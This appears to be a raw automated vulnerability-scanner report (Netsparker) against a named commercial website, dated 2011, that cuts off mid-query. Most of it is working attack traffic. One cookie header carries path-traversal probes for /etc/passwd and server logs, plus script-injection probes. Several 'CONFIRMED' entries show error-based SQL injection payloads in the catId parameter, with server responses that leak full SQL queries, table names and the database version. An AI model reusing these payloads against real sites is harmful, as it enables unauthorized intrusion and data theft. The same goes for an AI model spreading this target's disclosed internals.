User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hg8g6kep5lprpe7rest98lu0c4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lgds00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q1hi3t6n4n69hivo1d4evbe9l4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/phsy00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rpruebc941c547gklms4fomoh6; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/meac00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3522e2gn69248r9u9l46vra1i5; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
